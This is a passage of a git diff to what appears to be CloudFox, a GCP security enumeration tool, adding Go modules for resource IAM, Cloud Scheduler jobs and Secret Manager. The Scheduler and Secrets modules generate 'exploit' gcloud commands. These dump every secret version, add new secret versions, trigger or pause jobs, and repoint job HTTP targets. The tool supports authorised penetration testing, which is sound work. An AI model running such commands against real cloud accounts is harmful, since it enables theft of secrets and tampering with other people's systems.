append(resourceOrder, key) + } + resourceBindings[key] = append(resourceBindings[key], b) + } + + var body [][]string + for _, key := range resourceOrder { + bindings := resourceBindings[key] + if len(bindings) == 0 { + continue + } + + // Use first binding for resource info + first := bindings[0] + + // Check if any binding is public + isPublic := "No" + for _, b := range bindings { + if b.IsPublic { + isPublic = "Yes" + break + } + } + + // Build access list: one line per entity "memberType:member [role]" + var accessList []string + var conditionList []string + for _, b := range bindings { + // Format: memberType:member [shortRole] + member := b.MemberEmail + if member == "" { + member = b.Member + } + memberType := strings.ToLower(b.MemberType) + role := shortenRole(b.Role) + + entry := fmt.Sprintf("%s:%s [%s]", memberType, member, role) + accessList = append(accessList, entry) + + // Collect condition expressions + if b.HasCondition && b.ConditionExpression != "" { + condEntry := b.ConditionExpression + if b.ConditionTitle != "" { + condEntry = fmt.Sprintf("%s: %s", b.ConditionTitle, b.ConditionExpression) + } + // Avoid duplicates + found := false + for _, existing := range conditionList { + if existing == condEntry { + found = true + break + } + } + if !found { + conditionList = append(conditionList, condEntry) + } + } + } + + condition := "-" + if len(conditionList) > 0 { + condition = strings.Join(conditionList, "\n") + } + + body = append(body, []string{ + first.ProjectID, + first.ResourceType, + first.ResourceID, + first.ResourceName, + isPublic, + strings.Join(accessList, "\n"), + condition, + }) + } + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{ + { + Name: "resource-iam", + Header: header, + Body: body, + }, + } + + output := ResourceIAMOutput{ + Table: tables, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + []string{}, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_RESOURCEIAM_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/scheduler.go b/gcp/commands/scheduler.go new file mode 100644 index 00000000..0d4c47f7 --- /dev/null +++ b/gcp/commands/scheduler.go @@ -0,0 +1,427 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + SchedulerService "github.com/BishopFox/cloudfox/gcp/services/schedulerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSchedulerCommand = &cobra.Command{ + Use: globals.GCP_SCHEDULER_MODULE_NAME, + Aliases: []string{"cron", "jobs"}, + Short: "Enumerate Cloud Scheduler jobs with security analysis", + Long: `Enumerate Cloud Scheduler jobs across projects with security-relevant details. + +Features: +- Lists all Cloud Scheduler jobs +- Shows target configuration (HTTP, Pub/Sub, App Engine) +- Identifies service accounts used for authentication +- Shows schedule (cron) expressions +- Displays job state and last execution status +- Generates gcloud commands for job manipulation + +Security Columns: +- Target: HTTP endpoint, Pub/Sub topic, or App Engine service +- ServiceAccount: Identity used when invoking targets +- Schedule: When the job runs (cron expression) +- State: ENABLED, PAUSED, or DISABLED + +Attack Surface: +- HTTP targets may call internal or external endpoints +- Service accounts may have excessive permissions +- Jobs can be modified to call attacker-controlled endpoints +- Paused jobs may indicate suspended malicious activity`, + Run: runGCPSchedulerCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type SchedulerModule struct { + gcpinternal.BaseGCPModule + + ProjectJobs map[string][]SchedulerService.JobInfo // projectID -> jobs + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper analysis results + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type SchedulerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SchedulerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SchedulerOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSchedulerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SCHEDULER_MODULE_NAME) + if err != nil { + return + } + + module := &SchedulerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectJobs: make(map[string][]SchedulerService.JobInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SchedulerModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SCHEDULER_MODULE_NAME, m.processProject) + + allJobs := m.getAllJobs() + if len(allJobs) == 0 { + logger.InfoM("No Cloud Scheduler jobs found", globals.GCP_SCHEDULER_MODULE_NAME) + return + } + + // Count job states + enabledCount := 0 + httpCount := 0 + for _, job := range allJobs { + if job.State == "ENABLED" { + enabledCount++ + } + if job.TargetType == "http" { + httpCount++ + } + } + + msg := fmt.Sprintf("Found %d job(s)", len(allJobs)) + if enabledCount > 0 { + msg += fmt.Sprintf(" [%d enabled]", enabledCount) + } + if httpCount > 0 { + msg += fmt.Sprintf(" [%d HTTP targets]", httpCount) + } + logger.SuccessM(msg, globals.GCP_SCHEDULER_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllJobs returns all jobs from all projects +func (m *SchedulerModule) getAllJobs() []SchedulerService.JobInfo { + var all []SchedulerService.JobInfo + for _, jobs := range m.ProjectJobs { + all = append(all, jobs...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *SchedulerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Scheduler jobs in project: %s", projectID), globals.GCP_SCHEDULER_MODULE_NAME) + } + + ss := SchedulerService.New() + + jobs, err := ss.Jobs(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SCHEDULER_MODULE_NAME, + fmt.Sprintf("Could not enumerate Scheduler jobs in project %s", projectID)) + return + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectJobs[projectID] = jobs + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["scheduler-commands"] = &internal.LootFile{ + Name: "scheduler-commands", + Contents: "# Scheduler Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", + } + } + + for _, job := range jobs { + m.addJobToLoot(projectID, job) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d job(s) in project %s", len(jobs), projectID), globals.GCP_SCHEDULER_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SchedulerModule) addJobToLoot(projectID string, job SchedulerService.JobInfo) { + lootFile := m.LootMap[projectID]["scheduler-commands"] + if lootFile == nil { + return + } + + target := formatTargetFull(job) + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SCHEDULER JOB: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n"+ + "# State: %s\n"+ + "# Schedule: %s (%s)\n"+ + "# Target: %s -> %s\n", + job.Name, + job.ProjectID, job.Location, + job.State, + job.Schedule, job.TimeZone, + job.TargetType, target, + ) + + if job.ServiceAccount != "" { + lootFile.Contents += fmt.Sprintf( + "# Service Account: %s\n", + job.ServiceAccount, + ) + } + + lootFile.Contents += fmt.Sprintf( + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe job:\n"+ + "gcloud scheduler jobs describe %s --location=%s --project=%s\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Run job immediately:\n"+ + "gcloud scheduler jobs run %s --location=%s --project=%s\n\n"+ + "# Pause job:\n"+ + "gcloud scheduler jobs pause %s --location=%s --project=%s\n\n", + job.Name, job.Location, job.ProjectID, + job.Name, job.Location, job.ProjectID, + job.Name, job.Location, job.ProjectID, + ) + + if job.TargetType == "http" { + lootFile.Contents += fmt.Sprintf( + "# Update HTTP target (requires cloudscheduler.jobs.update):\n"+ + "gcloud scheduler jobs update http %s --location=%s --project=%s --uri=\"NEW_URL\"\n\n", + job.Name, job.Location, job.ProjectID, + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getTableHeader returns the header for the jobs table +func (m *SchedulerModule) getTableHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Job Name", + "Location", + "State", + "Schedule", + "Target Type", + "Target", + "Service Account", + "SA Attack Paths", + "Last Run", + } +} + +// jobsToTableBody converts jobs to table body rows +func (m *SchedulerModule) jobsToTableBody(jobs []SchedulerService.JobInfo) [][]string { + var body [][]string + for _, job := range jobs { + // Format target - full, no truncation + target := formatTargetFull(job) + + // Format service account - full, no truncation + sa := "-" + if job.ServiceAccount != "" { + sa = job.ServiceAccount + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if sa != "-" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) + } else { + attackPaths = "No" + } + } + + // Format last run + lastRun := "-" + if job.LastAttemptTime != "" { + lastRun = job.LastAttemptTime + if job.Status != "" && job.Status != "OK" { + lastRun += " (FAILED)" + } + } + + body = append(body, []string{ + m.GetProjectName(job.ProjectID), + job.ProjectID, + job.Name, + job.Location, + job.State, + job.Schedule, + job.TargetType, + target, + sa, + attackPaths, + lastRun, + }) + } + return body +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *SchedulerModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, jobs := range m.ProjectJobs { + body := m.jobsToTableBody(jobs) + tableFiles := []internal.TableFile{{ + Name: globals.GCP_SCHEDULER_MODULE_NAME, + Header: m.getTableHeader(), + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = SchedulerOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SCHEDULER_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *SchedulerModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allJobs := m.getAllJobs() + body := m.jobsToTableBody(allJobs) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + // Build table files + tableFiles := []internal.TableFile{{ + Name: globals.GCP_SCHEDULER_MODULE_NAME, + Header: m.getTableHeader(), + Body: body, + }} + + output := SchedulerOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SCHEDULER_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// formatTargetFull formats the job target for display without truncation +func formatTargetFull(job SchedulerService.JobInfo) string { + switch job.TargetType { + case "http": + return job.TargetURI + case "pubsub": + return job.TargetTopic + case "appengine": + target := job.TargetService + if job.TargetVersion != "" { + target += "/" + job.TargetVersion + } + if job.TargetURI != "" { + target += job.TargetURI + } + if target == "" { + return "-" + } + return target + default: + return "-" + } +} diff --git a/gcp/commands/secrets.go b/gcp/commands/secrets.go index f5c691c2..94aa29c9 100644 --- a/gcp/commands/secrets.go +++ b/gcp/commands/secrets.go @@ -1,120 +1,501 @@ package commands import ( + "context" "fmt" + "strings" + "sync" secretmanager "cloud.google.com/go/secretmanager/apiv1" SecretsService "github.com/BishopFox/cloudfox/gcp/services/secretsService" + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" ) var GCPSecretsCommand = &cobra.Command{ Use: globals.GCP_SECRETS_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP secrets information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available secrets information: -cloudfox gcp secrets`, + Aliases: []string{"secretmanager", "sm"}, + Short: "Enumerate GCP Secret Manager secrets with security configuration", + Long: `Enumerate GCP Secret Manager secrets across projects with security-relevant details. + +Features: +- Lists all secrets with metadata and security configuration +- Shows encryption type (Google-managed vs CMEK) +- Shows replication configuration (automatic vs user-managed) +- Shows expiration and rotation settings +- Enumerates IAM policies per secret +- Generates gcloud commands for secret access +- Generates exploitation commands for secret extraction + +Security Columns: +- Encryption: "Google-managed" or "CMEK" (customer-managed keys) +- Replication: "automatic" or "user-managed" with locations +- Rotation: Whether automatic rotation is enabled +- Expiration: Whether the secret has an expiration time/TTL +- VersionDestroyTTL: Delayed destruction period for old versions + +Resource IAM Columns: +- IAM Binding Role: The IAM role granted ON this secret (e.g., roles/secretmanager.secretAccessor) +- IAM Binding Principal: The principal (user/SA/group) who has that role on this secret`, Run: runGCPSecretsCommand, } -// GCPSecretsResults struct that implements the internal.OutputInterface -type GCPSecretsResults struct { - Data []SecretsService.SecretInfo +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type SecretsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - per-project for hierarchical output + ProjectSecrets map[string][]SecretsService.SecretInfo // projectID -> secrets + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper analysis results + client *secretmanager.Client + mu sync.Mutex } -func (g GCPSecretsResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type SecretsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} - header := []string{ - "Name", - "CreationTime", - "Labels", - "Rotation", - "ProjectID", - // Add more fields as necessary +func (o SecretsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SecretsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPSecretsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SECRETS_MODULE_NAME) + if err != nil { + return // Error already logged } - var body [][]string - for _, value := range g.Data { - body = append(body, []string{ - value.Name, - value.CreationTime, - fmt.Sprintf("%v", value.Labels), - value.Rotation, - value.ProjectID, - }) + // Create Secret Manager client + client, err := secretmanager.NewClient(cmdCtx.Ctx) + if err != nil { + cmdCtx.Logger.ErrorM(fmt.Sprintf("Failed to create Secret Manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) + return } + defer client.Close() - tableFile := internal.TableFile{ - Header: header, - Body: body, - Name: globals.GCP_SECRETS_MODULE_NAME, + // Create module instance + module := &SecretsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectSecrets: make(map[string][]SecretsService.SecretInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + client: client, } - tableFiles = append(tableFiles, tableFile) - return tableFiles + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } -func (g GCPSecretsResults) LootFiles() []internal.LootFile { - // Define any specific data considered as loot - return []internal.LootFile{} +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *SecretsModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache for graph-based analysis + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_SECRETS_MODULE_NAME) + } + + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SECRETS_MODULE_NAME, m.processProject) + + // Get all secrets for stats + allSecrets := m.getAllSecrets() + if len(allSecrets) == 0 { + logger.InfoM("No secrets found", globals.GCP_SECRETS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d secret(s)", len(allSecrets)), globals.GCP_SECRETS_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) } -func runGCPSecretsCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_SECRETS_MODULE_NAME) +// getAllSecrets returns all secrets from all projects (for statistics) +func (m *SecretsModule) getAllSecrets() []SecretsService.SecretInfo { + var all []SecretsService.SecretInfo + for _, secrets := range m.ProjectSecrets { + all = append(all, secrets...) + } + return all +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *SecretsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating secrets in project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) + } + + // Create service and fetch secrets + ss := SecretsService.New(m.client) + secrets, err := ss.Secrets(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SECRETS_MODULE_NAME, + fmt.Sprintf("Could not enumerate secrets in project %s", projectID)) return } - if value, ok := ctx.Value("account").(string); ok { - account = value + // Thread-safe store per-project + m.mu.Lock() + m.ProjectSecrets[projectID] = secrets + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["secrets-commands"] = &internal.LootFile{ + Name: "secrets-commands", + Contents: "# GCP Secret Manager Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + // Generate loot for each secret + for _, secret := range secrets { + m.addSecretToLoot(projectID, secret) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d secret(s) in project %s", len(secrets), projectID), globals.GCP_SECRETS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *SecretsModule) addSecretToLoot(projectID string, secret SecretsService.SecretInfo) { + lootFile := m.LootMap[projectID]["secrets-commands"] + if lootFile == nil { + return + } + + // Extract secret name from full path + secretName := getSecretShortName(secret.Name) + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SECRET: %s (Project: %s)\n"+ + "# =============================================================================\n"+ + "# Encryption: %s, Replication: %s, Rotation: %s\n"+ + "# Created: %s\n", + secretName, secret.ProjectID, + secret.EncryptionType, secret.ReplicationType, secret.Rotation, + secret.CreationTime, + ) + + // KMS key info + if secret.KMSKeyName != "" { + lootFile.Contents += fmt.Sprintf("# KMS Key: %s\n", secret.KMSKeyName) + } + + // Rotation info + if secret.Rotation == "enabled" { + if secret.RotationPeriod != "" { + lootFile.Contents += fmt.Sprintf("# Rotation Period: %s\n", secret.RotationPeriod) + } + if secret.NextRotationTime != "" { + lootFile.Contents += fmt.Sprintf("# Next Rotation: %s\n", secret.NextRotationTime) + } + } + + // IAM bindings + if len(secret.IAMBindings) > 0 { + lootFile.Contents += "# IAM Bindings:\n" + for _, binding := range secret.IAMBindings { + lootFile.Contents += fmt.Sprintf( + "# %s: %s\n", + binding.Role, + strings.Join(binding.Members, ", "), + ) + } + } + + // Commands + lootFile.Contents += fmt.Sprintf( + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe secret:\n"+ + "gcloud secrets describe %s --project=%s\n"+ + "# List versions:\n"+ + "gcloud secrets versions list %s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud secrets get-iam-policy %s --project=%s\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Access latest version:\n"+ + "gcloud secrets versions access latest --secret=%s --project=%s\n"+ + "# Download all versions:\n"+ + "for v in $(gcloud secrets versions list %s --project=%s --format='value(name)'); do\n"+ + " echo \"=== Version $v ===\"\n"+ + " gcloud secrets versions access $v --secret=%s --project=%s\n"+ + "done\n"+ + "# Add a new version:\n"+ + "echo -n 'new-secret-value' | gcloud secrets versions add %s --project=%s --data-file=-\n\n", + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + ) +} + + +// ------------------------------ +// Helper functions +// ------------------------------ + +// getSecretShortName extracts the short name from a full secret resource path +func getSecretShortName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_IAM_MODULE_NAME) + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *SecretsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, secrets := range m.ProjectSecrets { + body := m.secretsToTableBody(secrets) + tables := []internal.TableFile{{ + Name: globals.GCP_SECRETS_MODULE_NAME, + Header: header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = SecretsOutput{Table: tables, Loot: lootFiles} } - client, err := secretmanager.NewClient(ctx) + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) if err != nil { - logger.ErrorM(fmt.Sprintf("failed to create secret manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) - return + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SECRETS_MODULE_NAME) + m.CommandCounter.Error++ } - defer client.Close() +} - ss := SecretsService.New(client) - var results []SecretsService.SecretInfo - - // Set output params from parentCmd - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all secrets from project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) - result, err := ss.Secrets(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_SECRETS_MODULE_NAME) - return +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *SecretsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + allSecrets := m.getAllSecrets() + body := m.secretsToTableBody(allSecrets) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } } - results = append(results, result...) - logger.InfoM(fmt.Sprintf("Done retrieving all secrets from project: %s", projectID), globals.GCP_SECRETS_MODULE_NAME) - cloudfoxOutput := GCPSecretsResults{Data: results} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_SECRETS_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_SECRETS_MODULE_NAME) - return + } + + tableFiles := []internal.TableFile{{ + Name: globals.GCP_SECRETS_MODULE_NAME, + Header: header, + Body: body, + }} + + output := SecretsOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + // Build scope names from project names map + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + // Write output using HandleOutputSmart with scope support + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SECRETS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// getTableHeader returns the secrets table header +func (m *SecretsModule) getTableHeader() []string { + return []string{ + "Project", + "Name", + "Encryption", + "KMS Key", + "Replication", + "Rotation", + "Rotation Period", + "Next Rotation", + "Expiration", + "Destroy TTL", + "Created", + "IAM Binding Role", + "Principal Type", + "IAM Binding Principal", + "Principal Attack Paths", + } +} + +// secretsToTableBody converts secrets to table body rows +func (m *SecretsModule) secretsToTableBody(secrets []SecretsService.SecretInfo) [][]string { + var body [][]string + for _, secret := range secrets { + secretName := getSecretShortName(secret.Name) + + // Format expiration + expiration := "-" + if secret.HasExpiration { + if secret.ExpireTime != "" { + expiration = secret.ExpireTime + } else if secret.TTL != "" { + expiration = "TTL: " + secret.TTL + } + } + + // Format version destroy TTL + destroyTTL := "-" + if secret.VersionDestroyTTL != "" { + destroyTTL = secret.VersionDestroyTTL + } + + // Format KMS key (no truncation) + kmsKey := "-" + if secret.KMSKeyName != "" { + kmsKey = secret.KMSKeyName + } + + // Format rotation period + rotationPeriod := "-" + if secret.RotationPeriod != "" { + rotationPeriod = secret.RotationPeriod + } + + // Format next rotation + nextRotation := "-" + if secret.NextRotationTime != "" { + nextRotation = secret.NextRotationTime + } + + // One row per IAM member + if len(secret.IAMBindings) > 0 { + for _, binding := range secret.IAMBindings { + for _, member := range binding.Members { + memberType := shared.GetPrincipalType(member) + + // Check attack paths for service account principals + attackPaths := "-" + if memberType == "ServiceAccount" { + // Extract email from member string (serviceAccount:email@...) + email := strings.TrimPrefix(member, "serviceAccount:") + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, email) + } + + body = append(body, []string{ + m.GetProjectName(secret.ProjectID), + secretName, + secret.EncryptionType, + kmsKey, + secret.ReplicationType, + secret.Rotation, + rotationPeriod, + nextRotation, + expiration, + destroyTTL, + secret.CreationTime, + binding.Role, + memberType, + member, + attackPaths, + }) + } + } + } else { + // Secret with no IAM bindings + body = append(body, []string{ + m.GetProjectName(secret.ProjectID), + secretName, + secret.EncryptionType, + kmsKey, + secret.ReplicationType, + secret.Rotation, + rotationPeriod, + nextRotation, + expiration, + destroyTTL, + secret.CreationTime, + "-", + "-", + "-", + "-", + }) } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_SECRETS_MODULE_NAME) } + return body } diff --git a/gcp/commands/securitycenter.go b/gcp/commands/securitycenter.go new file mode 100644 index 00000000..fbd46b61 --- /dev/null +++ b/gcp/commands/securitycenter.go @@ -0,0 +1,685 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + securitycenter "cloud.google.com/go/securitycenter/apiv1" + "cloud.google.com/go/securitycenter/apiv1/securitycenterpb" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_SECURITYCENTER_MODULE_NAME string = "security-center" + +var GCPSecurityCenterCommand = &cobra.Command{ + Use: GCP_SECURITYCENTER_MODULE_NAME, + Aliases: []string{"scc", "security", "defender"}, 